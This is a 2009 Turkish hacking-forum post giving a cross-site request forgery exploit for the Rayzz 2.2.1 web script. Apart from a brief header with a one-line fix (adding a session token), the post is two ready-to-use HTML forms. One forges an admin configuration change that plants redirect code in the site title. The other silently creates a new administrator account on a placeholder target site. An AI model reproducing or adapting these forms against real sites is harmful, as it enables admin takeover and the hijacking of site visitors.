ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Rayzz ~ XSRF Vuln.
Rayzz ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/CWCaspeR
Date :
13.09.2009 21:16:09
#
Rayzz ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : Rayzz 2.2.1 # vulnerable Type : XSRF (add code - add admin) # Infection : Yeni admin eklenebilir ..! # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ! # Demo : http://demo.agriya.com/rayzz/ # author : CWCaspeR ~ Bug Researchers ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > [yönlendirme kodu ekleme] <form name=form_config id=selFormConfig method=post action=http://hedefsite.com/scriptyolu/admin/editConfig.php autocomplete=off> <div id=selConfigSection> <input type=hidden class=clsCheckRadio name=rewrite id=rewrite tabindex=1000 /> <input type=hidden class=clsTextBox name=site_name id=site_name value=Rayzz.net tabindex=1005 /> <input type=hidden class=clsTextBox name=site_title id=site_title value=YONLENDIRME KODU tabindex=1010 /> <input type=hidden class=clsTextBox name=noreply_name id=noreply_name value=Noreply tabindex=1015 /> <input type=hidden class=clsTextBox name=noreply_email id=noreply_email value=noreply@agriya.com tabindex=1020 /> <input type=hidden class=clsTextBox name=contactus_email id=contactus_email value=conatctus@agriya.com tabindex=1025 /> <input type=hidden class=clsTextBox name=index_page id=index_page value=20 tabindex=1030 /> <input type=hidden class=clsTextBox name=keywords id=keywords value=rayzz, rayzz.net, online social networking, video hosting, photo hosting, view, upload and share videos and photos tabindex=1035 /> <input type=hidden class=clsTextBox name=description id=description value=rayzz.net is a free online social networking site that also provides a free video and photo hosting service allowing users to view, upload, and share videos and photos. tabindex=1040 /> <input type=hidden class=clsTextBox name=numpg id=numpg value=16 tabindex=1045 /> <input type=hidden class=clsCheckRadio name=static_page_editor id=static_page_editor tabindex=1050 /> <input type=hidden class=clsCheckRadio name=external_url_open_in_new_window id=external_url_open_in_new_window tabindex=1055 checked /> <input type=hidden class=clsCheckRadio name=allow_all_post_article id=allow_all_post_article tabindex=1060 checked /> <input type=hidden class=clsCheckRadio name=add_default_friend id=add_default_friend tabindex=1065 checked /> <input type=hidden class=clsTextBox name=default_friend_name id=default_friend_name value=webmaster tabindex=1070 /> <input type=hidden class=clsCheckRadio name=signup_auto_activate id=signup_auto_activate tabindex=1075 /> <input type=hidden class=clsCheckRadio name=email_using_to_login id=email_using_to_login tabindex=1080 /> <input type=hidden class=clsCheckRadio name=default_friend_mail id=default_friend_mail tabindex=1085 checked /> <input type=hidden class=clsTextBox name=inactive_users_delete_period id=inactive_users_delete_period value=0 tabindex=1090 /> <input type=hidden class=clsTextBox name=captcha_method id=captcha_method value=honeypot tabindex=1095 /> <input type=submit class=clsSubmitButton name=edit_submit id=edit_submit value=BUTON ADI tabindex=1100 /> </form> [Yeni admin Ekleme] <form name=selFormEditProfile id=selFormEditProfile method=post action=http://hedefsite.com/scriptyolu/admin/memberAdd.php?mode=quick autocomplete=on> <input type=text class=clsTextBox name=user_name id=user_name tabindex=205 value=Kullanici adi /> <input type=text class=clsTextBox name=email id=email tabindex=210 value=e mail /> <input type=text class=clsTextBox name=password id=password tabindex=215 value= Sifre /> <select name=usr_access id=usr_access tabindex=220> <option value=Admin>Admin</option> </select> <input type=text class=clsTextBox name=first_name id=first_name tabindex=225 value=adiniz /> <input type=text class=clsTextBox name=last_name id=last_name tabindex=230 value=soyadiniz /> <select name=sex id=sex tabindex=235> <option value=male>Male</option> <option value=female>Female</option> </select> <select name=dob_date id=dob_date tabindex=240> <option value=1 >1</option> </select> <select name=dob_month id=dob_month tabindex=245> <option value=>ay</option> </select> <select name=dob_year id=dob_year tabindex=250> <option value=>1905</option> </select> <input type=text class=clsTextBox name=hometown id=hometown tabindex=255 value=websiteniz /> <input type=text class=clsTextBox name=city id=city tabindex=260 value=sehiriniz /> <input type=text class=clsTextBox name=postal_code id=postal_code tabindex=265 value=postakodu /> <select name=country id=country tabindex=270> <option value= selected=selected>Choose</option> <option value=TR>Turkey</option> </select> <input type=submit class=clsSubmitButton name=editprofile_submit id=editprofile_submit tabindex=275 value=create Member /> </form> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
